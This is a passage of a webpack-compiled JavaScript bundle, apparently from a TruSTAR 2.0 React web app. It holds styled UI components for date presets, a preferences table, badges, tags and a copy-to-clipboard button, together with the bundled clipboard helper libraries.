var _createClass = function () { function defineProperties(target, props) { for (var i = 0; i < props.length; i++) { var descriptor = props[i]; descriptor.enumerable = descriptor.enumerable || false; descriptor.configurable = true; if ("value" in descriptor) descriptor.writable = true; Object.defineProperty(target, descriptor.key, descriptor); } } return function (Constructor, protoProps, staticProps) { if (protoProps) defineProperties(Constructor.prototype, protoProps); if (staticProps) defineProperties(Constructor, staticProps); return Constructor; }; }();

function _classCallCheck(instance, Constructor) { if (!(instance instanceof Constructor)) { throw new TypeError("Cannot call a class as a function"); } }

function _possibleConstructorReturn(self, call) { if (!self) { throw new ReferenceError("this hasn't been initialised - super() hasn't been called"); } return call && (typeof call === "object" || typeof call === "function") ? call : self; }

function _inherits(subClass, superClass) { if (typeof superClass !== "function" && superClass !== null) { throw new TypeError("Super expression must either be null or a function, not " + typeof superClass); } subClass.prototype = Object.create(superClass && superClass.prototype, { constructor: { value: subClass, enumerable: false, writable: true, configurable: true } }); if (superClass) Object.setPrototypeOf ? Object.setPrototypeOf(subClass, superClass) : subClass.__proto__ = superClass; }






var debug = __WEBPACK_IMPORTED_MODULE_3_debug___default()('app:components:DateRangePresets'); // eslint-disable-line no-unused-vars




// Style
var StyledDateRangePresets = __WEBPACK_IMPORTED_MODULE_2_styled_components__["c" /* default */].div.withConfig({
  displayName: 'DateRangePresets__StyledDateRangePresets',
  componentId: 'j1b9os-0'
})(['display:inline-flex;justify-content:space-evenly;padding:0.25rem 0;span{margin-right:0.25rem;min-width:2rem;text-align:center;font-size:', ';&:hover{cursor:pointer;font-weight:bold;}}'], function (_ref) {
  var theme = _ref.theme;
  return theme.FontSizes.P;
});

var initialValues = {
  options: __WEBPACK_IMPORTED_MODULE_4_trustar_2_0_utils_Date_constants__["a" /* default */].DATE_PRESET_DEFAULTS,
  theme: __WEBPACK_IMPORTED_MODULE_6_trustar_2_0_themes__["b" /* DefaultTheme */]
};

// Bindings

var DateRangePresets = function (_Component) {
  _inherits(DateRangePresets, _Component);

  function DateRangePresets() {
    var _ref2;

    var _temp, _this, _ret;

    _classCallCheck(this, DateRangePresets);

    for (var _len = arguments.length, args = Array(_len), _key = 0; _key < _len; _key++) {
      args[_key] = arguments[_key];
    }

    return _ret = (_temp = (_this = _possibleConstructorReturn(this, (_ref2 = DateRangePresets.__proto__ || Object.getPrototypeOf(DateRangePresets)).call.apply(_ref2, [this].concat(args))), _this), _this.selectPreset = function (option) {
      _this.props.onSelectOption(option);
    }, _temp), _possibleConstructorReturn(_this, _ret);
  }

  _createClass(DateRangePresets, [{
    key: 'render',


    //  ----Template----

    value: function render() {
      var _this2 = this;

      var presets = this.props.options;
      return __WEBPACK_IMPORTED_MODULE_0_react___default.a.createElement(
        StyledDateRangePresets,
        null,
        presets.map(function (option, index) {
          return __WEBPACK_IMPORTED_MODULE_0_react___default.a.createElement(
            'span',
            {
              key: index,
              style: { fontWeight: _this2.props.selectedPreset === option.label ? 'bold' : 'initial' },
              onClick: function onClick(e) {
                return _this2.selectPreset(option);
              } },
            option.label
          );
        })
      );
    }

    // ----Lifecycle Hooks----

    // ----Methods----

  }]);

  return DateRangePresets;
}(__WEBPACK_IMPORTED_MODULE_0_react__["Component"]);

// Logic & Helper Components

// export default connect(mapStateToProps, dispatchProps)(DateRangePresets);

DateRangePresets.defaultProps = initialValues;


/***/ }),
/* 3543 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0__PreferenceTable__ = __webpack_require__(3544);
/* harmony reexport (module object) */ __webpack_require__.d(__webpack_exports__, "a", function() { return __WEBPACK_IMPORTED_MODULE_0__PreferenceTable__; });



/***/ }),
/* 3544 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
Object.defineProperty(__webpack_exports__, "__esModule", { value: true });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "Container", function() { return Container; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "TableTitle", function() { return TableTitle; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "Table", function() { return Table; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "Head", function() { return Head; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "HeadCell", function() { return HeadCell; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "Row", function() { return Row; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "LabelCell", function() { return LabelCell; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "SettingCell", function() { return SettingCell; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "SettingCellComplex", function() { return SettingCellComplex; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "ColumnTitle", function() { return ColumnTitle; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "SettingTitle", function() { return SettingTitle; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "PreferenceTitle", function() { return PreferenceTitle; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "PreferenceDescription", function() { return PreferenceDescription; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "SectionBreak", function() { return SectionBreak; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "CheckboxInput", function() { return CheckboxInput; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "Loader", function() { return Loader; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "Input", function() { return Input; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "InputLabel", function() { return InputLabel; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "InputContainer", function() { return InputContainer; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "SettingInstruction", function() { return SettingInstruction; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "UpdateButton", function() { return UpdateButton; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "SpecialSection", function() { return SpecialSection; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "TableBody", function() { return TableBody; });
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0_react__ = __webpack_require__(0);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0_react___default = __webpack_require__.n(__WEBPACK_IMPORTED_MODULE_0_react__);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_1_styled_components__ = __webpack_require__(11);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_2_trustar_2_0_components_Button__ = __webpack_require__(96);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_3_trustar_2_0_themes_common__ = __webpack_require__(212);
var _extends = Object.assign || function (target) { for (var i = 1; i < arguments.length; i++) { var source = arguments[i]; for (var key in source) { if (Object.prototype.hasOwnProperty.call(source, key)) { target[key] = source[key]; } } } return target; };






var Container = __WEBPACK_IMPORTED_MODULE_1_styled_components__["c" /* default */].div.withConfig({
  displayName: 'PreferenceTable__Container',
  componentId: 'sc-7fchi2-0'
})(['padding:1.5rem 4rem 1rem 4rem;overflow-y:auto;height:100%;h1,h2,h3,h4,h5,h6,p,span{color:', ';}p{font-weight:300;}.btn.btn-secondary{color:white;}'], function (_ref) {
  var theme = _ref.theme;
  return theme.ThemeColors.TEXT.hex;
});

var TableTitle = __WEBPACK_IMPORTED_MODULE_1_styled_components__["c" /* default */].h1.withConfig({
  displayName: 'PreferenceTable__TableTitle',
  componentId: 'sc-7fchi2-1'
})(['&&{margin-bottom:2rem;&.digestTitle,&.watchKeywordsTitle{margin-bottom:1rem;}}']);

var Table = __WEBPACK_IMPORTED_MODULE_1_styled_components__["c" /* default */].table.withConfig({
  displayName: 'PreferenceTable__Table',
  componentId: 'sc-7fchi2-2'
})(['&&{width:100%;border-collapse:collapse;table-layout:fixed;}']);

var Head = __WEBPACK_IMPORTED_MODULE_1_styled_components__["c" /* default */].thead.withConfig({
  displayName: 'PreferenceTable__Head',
  componentId: 'sc-7fchi2-3'
})(['border-bottom:1px solid ', ';margin-bottom:2rem;'], function (_ref2) {
  var theme = _ref2.theme;
  return theme.ThemeColors.TEXT.X100;
});

var HeadCell = __WEBPACK_IMPORTED_MODULE_1_styled_components__["c" /* default */].th.withConfig({
  displayName: 'PreferenceTable__HeadCell',
  componentId: 'sc-7fchi2-4'
})(['']);

var Row = __WEBPACK_IMPORTED_MODULE_1_styled_components__["c" /* default */].tr.withConfig({
  displayName: 'PreferenceTable__Row',
  componentId: 'sc-7fchi2-5'
})(['']);

var LabelCell = __WEBPACK_IMPORTED_MODULE_1_styled_components__["c" /* default */].td.withConfig({
  displayName: 'PreferenceTable__LabelCell',
  componentId: 'sc-7fchi2-6'
})(['padding-top:1rem;width:50%;margin-right:3rem;']);

var SettingCell = Object(__WEBPACK_IMPORTED_MODULE_1_styled_components__["c" /* default */])(LabelCell).withConfig({
  displayName: 'PreferenceTable__SettingCell',
  componentId: 'sc-7fchi2-7'
})(['text-align:center;vertical-align:middle;']);

var SettingCellComplex = Object(__WEBPACK_IMPORTED_MODULE_1_styled_components__["c" /* default */])(LabelCell).withConfig({
  displayName: 'PreferenceTable__SettingCellComplex',
  componentId: 'sc-7fchi2-8'
})(['&&{text-align:left;vertical-align:top;padding-left:3rem;padding-right:1rem;}']);

var ColumnTitle = __WEBPACK_IMPORTED_MODULE_1_styled_components__["c" /* default */].h3.withConfig({
  displayName: 'PreferenceTable__ColumnTitle',
  componentId: 'sc-7fchi2-9'
})(['&&{font-weight:300;line-height:1.5rem;margin-bottom:0.5rem;}']);

var SettingTitle = Object(__WEBPACK_IMPORTED_MODULE_1_styled_components__["c" /* default */])(ColumnTitle).withConfig({
  displayName: 'PreferenceTable__SettingTitle',
  componentId: 'sc-7fchi2-10'
})(['&&{font-weight:bold;text-align:center;}']);

var PreferenceTitle = __WEBPACK_IMPORTED_MODULE_1_styled_components__["c" /* default */].h3.withConfig({
  displayName: 'PreferenceTable__PreferenceTitle',
  componentId: 'sc-7fchi2-11'
})(['&&{line-height:1.5;font-weight:bold;margin-bottom:0.25rem;}']);

var PreferenceDescription = __WEBPACK_IMPORTED_MODULE_1_styled_components__["c" /* default */].p.withConfig({
  displayName: 'PreferenceTable__PreferenceDescription',
  componentId: 'sc-7fchi2-12'
})(['']);

var SectionBreak = __WEBPACK_IMPORTED_MODULE_1_styled_components__["c" /* default */].hr.withConfig({
  displayName: 'PreferenceTable__SectionBreak',
  componentId: 'sc-7fchi2-13'
})(['&&{border-top:1px solid ', ';margin-bottom:1.833rem;margin-top:1.833rem;}'], function (_ref3) {
  var theme = _ref3.theme;
  return theme.ThemeColors.TEXT.X100;
});

var CheckboxInput = function CheckboxInput(props) {
  return __WEBPACK_IMPORTED_MODULE_0_react___default.a.createElement(Input, _extends({ className: 'help' }, props));
};

var Loader = function Loader(props) {
  var Wrapper = __WEBPACK_IMPORTED_MODULE_1_styled_components__["c" /* default */].div.withConfig({
    displayName: 'PreferenceTable__Wrapper',
    componentId: 'sc-7fchi2-14'
  })(['&&{width:100%;}']);
  var loadingMessage = __WEBPACK_IMPORTED_MODULE_0_react___default.a.createElement(
    Wrapper,
    null,
    'Your preferences are loading.'
  );
  return props.isLoading ? loadingMessage : __WEBPACK_IMPORTED_MODULE_0_react___default.a.createElement(
    Wrapper,
    null,
    props.children
  );
};

var Input = __WEBPACK_IMPORTED_MODULE_1_styled_components__["c" /* default */].input.withConfig({
  displayName: 'PreferenceTable__Input',
  componentId: 'sc-7fchi2-15'
})(['&&{margin-right:0.25rem;}&:not(:first-child){margin-left:2rem;}']);

var InputLabel = __WEBPACK_IMPORTED_MODULE_1_styled_components__["c" /* default */].label.withConfig({
  displayName: 'PreferenceTable__InputLabel',
  componentId: 'sc-7fchi2-16'
})(['&&{margin-left:0.5rem;}']);

var InputContainer = __WEBPACK_IMPORTED_MODULE_1_styled_components__["c" /* default */].div.withConfig({
  displayName: 'PreferenceTable__InputContainer',
  componentId: 'sc-7fchi2-17'
})(['margin-top:1rem;']);

var SettingInstruction = __WEBPACK_IMPORTED_MODULE_1_styled_components__["c" /* default */].h6.withConfig({
  displayName: 'PreferenceTable__SettingInstruction',
  componentId: 'sc-7fchi2-18'
})(['&&{font-size:1rem;color:', ';font-weight:300;&.unsubscribeToggle{font-weight:bold;color:', ';margin-bottom:1rem;}}'], function (_ref4) {
  var theme = _ref4.theme;
  return theme.ThemeColors.LINK_TEXT.X700;
}, function (_ref5) {
  var theme = _ref5.theme;
  return theme.ThemeColors.TEXT.hex;
});

var UpdateButton = __WEBPACK_IMPORTED_MODULE_2_trustar_2_0_components_Button__["f" /* SpinnerButton */];

var SpecialSection = __WEBPACK_IMPORTED_MODULE_1_styled_components__["c" /* default */].div.withConfig({
  displayName: 'PreferenceTable__SpecialSection',
  componentId: 'sc-7fchi2-19'
})(['&&{background:', ';}padding-left:19px;padding-right:19px;padding-top:22px;padding-bottom:22px;min-height:189px;border:1px solid ', ';'], function (_ref6) {
  var theme = _ref6.theme;
  return Object(__WEBPACK_IMPORTED_MODULE_3_trustar_2_0_themes_common__["inDarkMode"])(theme) ? theme.ThemeColors.SURFACE_LIGHTER : theme.ThemeColors.SEARCH_FILTER_BAR.X200;
}, function (_ref7) {
  var theme = _ref7.theme;
  return theme.ThemeColors.BORDER.hex;
});

var TableBody = __WEBPACK_IMPORTED_MODULE_1_styled_components__["c" /* default */].tbody.withConfig({
  displayName: 'PreferenceTable__TableBody',
  componentId: 'sc-7fchi2-20'
})(['']);

/***/ }),
/* 3545 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "a", function() { return Badge; });
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0_react__ = __webpack_require__(0);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0_react___default = __webpack_require__.n(__WEBPACK_IMPORTED_MODULE_0_react__);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_1_styled_components__ = __webpack_require__(11);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_2_trustar_2_0_components__ = __webpack_require__(42);
var _extends = Object.assign || function (target) { for (var i = 1; i < arguments.length; i++) { var source = arguments[i]; for (var key in source) { if (Object.prototype.hasOwnProperty.call(source, key)) { target[key] = source[key]; } } } return target; };





var Badge = function Badge(props) {
  var Button = __WEBPACK_IMPORTED_MODULE_1_styled_components__["c" /* default */].button.withConfig({
    displayName: 'Badge__Button',
    componentId: 'sc-1vh7db4-0'
  })(['&&{font-size:1rem;font-weight:600;line-height:1.33rem;cursor:pointer;border:1px solid ', ';border-radius:3px;color:', ';background-color:', ';padding:4px .833rem 4px .833rem;margin-top:1rem;margin-right:21px;vertical-align:middle;display:inline;}'], function (_ref) {
    var theme = _ref.theme;
    return theme.ThemeColors.TEXT.hex;
  }, function (_ref2) {
    var theme = _ref2.theme;
    return theme.ThemeColors.TEXT.hex;
  }, function (_ref3) {
    var theme = _ref3.theme;
    return theme.ThemeColors.SURFACE.hex;
  });
  var StyledIcon = Object(__WEBPACK_IMPORTED_MODULE_1_styled_components__["c" /* default */])(__WEBPACK_IMPORTED_MODULE_2_trustar_2_0_components__["o" /* Icon */]).withConfig({
    displayName: 'Badge__StyledIcon',
    componentId: 'sc-1vh7db4-1'
  })(['&&{line-height:1rem;font-size:.8rem;margin-right:5px;vertical-align:middle;}']);
  return __WEBPACK_IMPORTED_MODULE_0_react___default.a.createElement(
    Button,
    _extends({}, props, {
      size: 'large',
      onClick: function onClick() {
        props.onClick(props.badgeKey);
      }
    }),
    __WEBPACK_IMPORTED_MODULE_0_react___default.a.createElement(StyledIcon, { icon: __WEBPACK_IMPORTED_MODULE_2_trustar_2_0_components__["s" /* IconLookup */].CROSS }),
    props.children
  );
};

Badge.defaultProps = {
  badgeKey: ''
};

/***/ }),
/* 3546 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "a", function() { return ClipboardCopy; });
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0_react__ = __webpack_require__(0);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0_react___default = __webpack_require__.n(__WEBPACK_IMPORTED_MODULE_0_react__);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_1_react_redux__ = __webpack_require__(24);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_2_styled_components__ = __webpack_require__(11);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_3_debug__ = __webpack_require__(7);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_3_debug___default = __webpack_require__.n(__WEBPACK_IMPORTED_MODULE_3_debug__);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_4_trustar_2_0_types__ = __webpack_require__(97);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_5_react_copy_to_clipboard__ = __webpack_require__(1635);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_5_react_copy_to_clipboard___default = __webpack_require__.n(__WEBPACK_IMPORTED_MODULE_5_react_copy_to_clipboard__);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_6_trustar_2_0_components__ = __webpack_require__(42);
var _createClass = function () { function defineProperties(target, props) { for (var i = 0; i < props.length; i++) { var descriptor = props[i]; descriptor.enumerable = descriptor.enumerable || false; descriptor.configurable = true; if ("value" in descriptor) descriptor.writable = true; Object.defineProperty(target, descriptor.key, descriptor); } } return function (Constructor, protoProps, staticProps) { if (protoProps) defineProperties(Constructor.prototype, protoProps); if (staticProps) defineProperties(Constructor, staticProps); return Constructor; }; }();

function _classCallCheck(instance, Constructor) { if (!(instance instanceof Constructor)) { throw new TypeError("Cannot call a class as a function"); } }

function _possibleConstructorReturn(self, call) { if (!self) { throw new ReferenceError("this hasn't been initialised - super() hasn't been called"); } return call && (typeof call === "object" || typeof call === "function") ? call : self; }

function _inherits(subClass, superClass) { if (typeof superClass !== "function" && superClass !== null) { throw new TypeError("Super expression must either be null or a function, not " + typeof superClass); } subClass.prototype = Object.create(superClass && superClass.prototype, { constructor: { value: subClass, enumerable: false, writable: true, configurable: true } }); if (superClass) Object.setPrototypeOf ? Object.setPrototypeOf(subClass, superClass) : subClass.__proto__ = superClass; }





var debug = __WEBPACK_IMPORTED_MODULE_3_debug___default()('app:components:ClipboardCopy'); // eslint-disable-line no-unused-vars




// Style for Main Components (things you may export)
var StyledClipboardCopy = Object(__WEBPACK_IMPORTED_MODULE_2_styled_components__["c" /* default */])(__WEBPACK_IMPORTED_MODULE_5_react_copy_to_clipboard___default.a).withConfig({
  displayName: 'ClipboardCopy__StyledClipboardCopy',
  componentId: 'sc-1667o1l-0'
})(['display:inline-flex;align-items:center;i,.copiedNotification{margin-left:0.5rem;opacity:0;transition:opacity 0.25s ease-in;}i{font-size:1.25rem;cursor:pointer;opacity:', ';}i:hover{color:', ';font-weight:bold;}.copiedNotification{font-weight:300;font-size:0.9rem;}.copiedNotification.wasCopied{opacity:1;}'], function (props) {
  return props.canCopy ? 1 : 0;
}, function (_ref) {
  var theme = _ref.theme;
  return theme.ThemeColors.TEXT.hex;
});

var initialValues = {
  isCopied: false,
  fontSize: '1rem',
  canCopy: false
};

// Bindings

var ClipboardCopy = function (_Component) {
  _inherits(ClipboardCopy, _Component);

  function ClipboardCopy() {
    var _ref2;

    var _temp, _this, _ret;

    _classCallCheck(this, ClipboardCopy);

    for (var _len = arguments.length, args = Array(_len), _key = 0; _key < _len; _key++) {
      args[_key] = arguments[_key];
    }

    return _ret = (_temp = (_this = _possibleConstructorReturn(this, (_ref2 = ClipboardCopy.__proto__ || Object.getPrototypeOf(ClipboardCopy)).call.apply(_ref2, [this].concat(args))), _this), _this.state = {
      wasCopied: false
    }, _this.clipboardCopyWithTimeout = function (option) {
      var ourState = _this;
      _this.setState({
        wasCopied: true
      });
      setTimeout(function () {
        ourState.setState({
          wasCopied: false
        });
      }, 2000);
    }, _temp), _possibleConstructorReturn(_this, _ret);
  }

  _createClass(ClipboardCopy, [{
    key: 'render',


    //  ----Template----

    value: function render() {
      var wasCopied = this.state.wasCopied;
      var _props = this.props,
          canCopy = _props.canCopy,
          textToCopy = _props.textToCopy;

      return __WEBPACK_IMPORTED_MODULE_0_react___default.a.createElement(
        StyledClipboardCopy,
        {
          className: 'clipboard',
          text: textToCopy,
          canCopy: canCopy,
          onCopy: this.clipboardCopyWithTimeout },
        __WEBPACK_IMPORTED_MODULE_0_react___default.a.createElement(
          'div',
          { onClick: function onClick(e) {
              return e.stopPropagation();
            } },
          __WEBPACK_IMPORTED_MODULE_0_react___default.a.createElement(__WEBPACK_IMPORTED_MODULE_6_trustar_2_0_components__["o" /* Icon */], { icon: __WEBPACK_IMPORTED_MODULE_6_trustar_2_0_components__["s" /* IconLookup */].CLIPBOARD_CHECK }),
          __WEBPACK_IMPORTED_MODULE_0_react___default.a.createElement(
            'span',
            { className: 'copiedNotification ' + (wasCopied ? 'wasCopied' : '') },
            'Copied!'
          )
        )
      );
    }

    // ----Lifecycle Hooks----

    // ----Methods----

  }]);

  return ClipboardCopy;
}(__WEBPACK_IMPORTED_MODULE_0_react__["Component"]);

// Logic & Helper Components


ClipboardCopy.defaultProps = initialValues;
var options = [];



/***/ }),
/* 3547 */
/***/ (function(module, exports, __webpack_require__) {

"use strict";


Object.defineProperty(exports, "__esModule", {
  value: true
});
exports.CopyToClipboard = undefined;

var _extends = Object.assign || function (target) { for (var i = 1; i < arguments.length; i++) { var source = arguments[i]; for (var key in source) { if (Object.prototype.hasOwnProperty.call(source, key)) { target[key] = source[key]; } } } return target; };

var _createClass = function () { function defineProperties(target, props) { for (var i = 0; i < props.length; i++) { var descriptor = props[i]; descriptor.enumerable = descriptor.enumerable || false; descriptor.configurable = true; if ("value" in descriptor) descriptor.writable = true; Object.defineProperty(target, descriptor.key, descriptor); } } return function (Constructor, protoProps, staticProps) { if (protoProps) defineProperties(Constructor.prototype, protoProps); if (staticProps) defineProperties(Constructor, staticProps); return Constructor; }; }();

var _react = __webpack_require__(0);

var _react2 = _interopRequireDefault(_react);

var _copyToClipboard = __webpack_require__(3548);

var _copyToClipboard2 = _interopRequireDefault(_copyToClipboard);

function _interopRequireDefault(obj) { return obj && obj.__esModule ? obj : { default: obj }; }

function _objectWithoutProperties(obj, keys) { var target = {}; for (var i in obj) { if (keys.indexOf(i) >= 0) continue; if (!Object.prototype.hasOwnProperty.call(obj, i)) continue; target[i] = obj[i]; } return target; }

function _classCallCheck(instance, Constructor) { if (!(instance instanceof Constructor)) { throw new TypeError("Cannot call a class as a function"); } }

function _possibleConstructorReturn(self, call) { if (!self) { throw new ReferenceError("this hasn't been initialised - super() hasn't been called"); } return call && (typeof call === "object" || typeof call === "function") ? call : self; }

function _inherits(subClass, superClass) { if (typeof superClass !== "function" && superClass !== null) { throw new TypeError("Super expression must either be null or a function, not " + typeof superClass); } subClass.prototype = Object.create(superClass && superClass.prototype, { constructor: { value: subClass, enumerable: false, writable: true, configurable: true } }); if (superClass) Object.setPrototypeOf ? Object.setPrototypeOf(subClass, superClass) : subClass.__proto__ = superClass; }

var CopyToClipboard = exports.CopyToClipboard = function (_React$PureComponent) {
  _inherits(CopyToClipboard, _React$PureComponent);

  function CopyToClipboard() {
    var _ref;

    var _temp, _this, _ret;

    _classCallCheck(this, CopyToClipboard);

    for (var _len = arguments.length, args = Array(_len), _key = 0; _key < _len; _key++) {
      args[_key] = arguments[_key];
    }

    return _ret = (_temp = (_this = _possibleConstructorReturn(this, (_ref = CopyToClipboard.__proto__ || Object.getPrototypeOf(CopyToClipboard)).call.apply(_ref, [this].concat(args))), _this), _this.onClick = function (event) {
      var _this$props = _this.props,
          text = _this$props.text,
          onCopy = _this$props.onCopy,
          children = _this$props.children,
          options = _this$props.options;


      var elem = _react2.default.Children.only(children);

      var result = (0, _copyToClipboard2.default)(text, options);

      if (onCopy) {
        onCopy(text, result);
      }

      // Bypass onClick if it was present
      if (elem && elem.props && typeof elem.props.onClick === 'function') {
        elem.props.onClick(event);
      }
    }, _temp), _possibleConstructorReturn(_this, _ret);
  }

  _createClass(CopyToClipboard, [{
    key: 'render',
    value: function render() {
      var _props = this.props,
          _text = _props.text,
          _onCopy = _props.onCopy,
          _options = _props.options,
          children = _props.children,
          props = _objectWithoutProperties(_props, ['text', 'onCopy', 'options', 'children']);

      var elem = _react2.default.Children.only(children);

      return _react2.default.cloneElement(elem, _extends({}, props, { onClick: this.onClick }));
    }
  }]);

  return CopyToClipboard;
}(_react2.default.PureComponent);

CopyToClipboard.defaultProps = {
  onCopy: undefined,
  options: undefined
};

/***/ }),
/* 3548 */
/***/ (function(module, exports, __webpack_require__) {

"use strict";


var deselectCurrent = __webpack_require__(3549);

var defaultMessage = 'Copy to clipboard: #{key}, Enter';

function format(message) {
  var copyKey = (/mac os x/i.test(navigator.userAgent) ? '⌘' : 'Ctrl') + '+C';
  return message.replace(/#{\s*key\s*}/g, copyKey);
}

function copy(text, options) {
  var debug, message, reselectPrevious, range, selection, mark, success = false;
  if (!options) { options = {}; }
  debug = options.debug || false;
  try {
    reselectPrevious = deselectCurrent();

    range = document.createRange();
    selection = document.getSelection();

    mark = document.createElement('span');
    mark.textContent = text;
    // reset user styles for span element
    mark.style.all = 'unset';
    // prevents scrolling to the end of the page
    mark.style.position = 'fixed';
    mark.style.top = 0;
    mark.style.clip = 'rect(0, 0, 0, 0)';
    // used to preserve spaces and line breaks
    mark.style.whiteSpace = 'pre';
    // do not inherit user-select (it may be `none`)
    mark.style.webkitUserSelect = 'text';
    mark.style.MozUserSelect = 'text';
    mark.style.msUserSelect = 'text';
    mark.style.userSelect = 'text';

    document.body.appendChild(mark);

    range.selectNode(mark);
    selection.addRange(range);

    var successful = document.execCommand('copy');
    if (!successful) {
      throw new Error('copy command was unsuccessful');
    }
    success = true;
  } catch (err) {
    debug && console.error('unable to copy using execCommand: ', err);
    debug && console.warn('trying IE specific stuff');
    try {
      window.clipboardData.setData('text', text);
      success = true;
    } catch (err) {
      debug && console.error('unable to copy using clipboardData: ', err);
      debug && console.error('falling back to prompt');
      message = format('message' in options ? options.message : defaultMessage);
      window.prompt(message, text);
    }
  } finally {
    if (selection) {
      if (typeof selection.removeRange == 'function') {
        selection.removeRange(range);
      } else {
        selection.removeAllRanges();
      }
    }

    if (mark) {
      document.body.removeChild(mark);
    }
    reselectPrevious();
  }

  return success;
}

module.exports = copy;


/***/ }),
/* 3549 */
/***/ (function(module, exports) {


module.exports = function () {
  var selection = document.getSelection();
  if (!selection.rangeCount) {
    return function () {};
  }
  var active = document.activeElement;

  var ranges = [];
  for (var i = 0; i < selection.rangeCount; i++) {
    ranges.push(selection.getRangeAt(i));
  }

  switch (active.tagName.toUpperCase()) { // .toUpperCase handles XHTML
    case 'INPUT':
    case 'TEXTAREA':
      active.blur();
      break;

    default:
      active = null;
      break;
  }

  selection.removeAllRanges();
  return function () {
    selection.type === 'Caret' &&
    selection.removeAllRanges();

    if (!selection.rangeCount) {
      ranges.forEach(function(range) {
        selection.addRange(range);
      });
    }

    active &&
    active.focus();
  };
};


/***/ }),
/* 3550 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
/* unused harmony export TagList */
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0_react__ = __webpack_require__(0);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0_react___default = __webpack_require__.n(__WEBPACK_IMPORTED_MODULE_0_react__);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_1_react_redux__ = __webpack_require__(24);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_2_styled_components__ = __webpack_require__(11);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_3_debug__ = __webpack_require__(7);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_3_debug___default = __webpack_require__.n(__WEBPACK_IMPORTED_MODULE_3_debug__);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_4_trustar_2_0_types__ = __webpack_require__(97);
function _objectWithoutProperties(obj, keys) { var target = {}; for (var i in obj) { if (keys.indexOf(i) >= 0) continue; if (!Object.prototype.hasOwnProperty.call(obj, i)) continue; target[i] = obj[i]; } return target; }





var debug = __WEBPACK_IMPORTED_MODULE_3_debug___default()('app:components:TagList'); // eslint-disable-line no-unused-vars


var initialValues = {};

// Bindings


var StyledTagList = __WEBPACK_IMPORTED_MODULE_2_styled_components__["c" /* default */].ul.withConfig({
  displayName: 'TagList__StyledTagList',
  componentId: 'sc-1qa15i8-0'
})(['padding:0;margin-top:0;overflow-y:auto;']);

var TagList = function TagList(_ref) {
  var otherProps = _objectWithoutProperties(_ref, []);

  return __WEBPACK_IMPORTED_MODULE_0_react___default.a.createElement(StyledTagList, otherProps);
};



/***/ }),
/* 3551 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "a", function() { return BaseTag; });
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0_react__ = __webpack_require__(0);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0_react___default = __webpack_require__.n(__WEBPACK_IMPORTED_MODULE_0_react__);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_1_styled_components__ = __webpack_require__(11);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_2_debug__ = __webpack_require__(7);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_2_debug___default = __webpack_require__.n(__WEBPACK_IMPORTED_MODULE_2_debug__);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_3_trustar_2_0_types__ = __webpack_require__(97);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_4_trustar_2_0_components__ = __webpack_require__(42);
